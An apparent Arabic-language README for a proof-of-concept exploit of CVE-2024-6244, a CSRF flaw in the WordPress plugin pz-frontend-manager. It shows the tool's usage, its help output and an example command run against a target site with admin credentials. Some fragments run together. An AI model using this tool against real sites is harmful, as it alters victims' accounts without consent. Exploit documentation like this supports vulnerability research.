
pz-frontend-manager < 1.0.6 - استغلال CSRF لصورة الملف الشخصي
يستغل هذا السكريبت ثغرة CSRF في إضافة ووردبريس pz-frontend-manager (الإصدارات <= 1.0.5) لتغيير صورة الملف الشخصي لمستخدم مسجّل الدخول دون موافقته.
🔴 CVE-2024-6244
تفتقر الإضافة إلى حماية CSRF مناسبة، مما يسمح للمهاجمين بإجبار المستخدمين الموثّقين على تنفيذ إجراءات غير مقصودة عبر طلبات مزيفة.
readme.txt لتحديد ما إذا كان الموقع المستهدف يعمل بإصدار قابل للاستغلال (< 1.0.6).admin-ajax.php./wp-content/uploads/2025/02/
python3 CVE-2024-6244.py -u <TARGET_URL> -U <USERNAME> -p <PASSWORD> -i <IMAGE_FILE>
usage: p.py [-h] --url URL --username USERNAME --password PASSWORD [--image IMAGE]
pz-frontend-manager <= 1.0.5 - CSRF change user profile picture
options:
-h, --help show this help message and exit
--url URL, -u URL Base URL of the WordPress site
--username USERNAME, -U USERNAME
Username for login
--password PASSWORD, -p PASSWORD
Password for login
--image IMAGE, -i IMAGE
Image file name (default: Nxploit.jpg)
python3 CVE-2024-6244.py -u "https://victim-site.com" -U "admin" -p "password123" -i "new_avatar.png"
requests (pip install requests)هذا السكريبت لأغراض تعليمية وبحوث أمنية فقط. الاستغلال غير المصرّح به للمواقع دون إذن غير قانوني وقد يؤدي إلى عواقب وخيمة.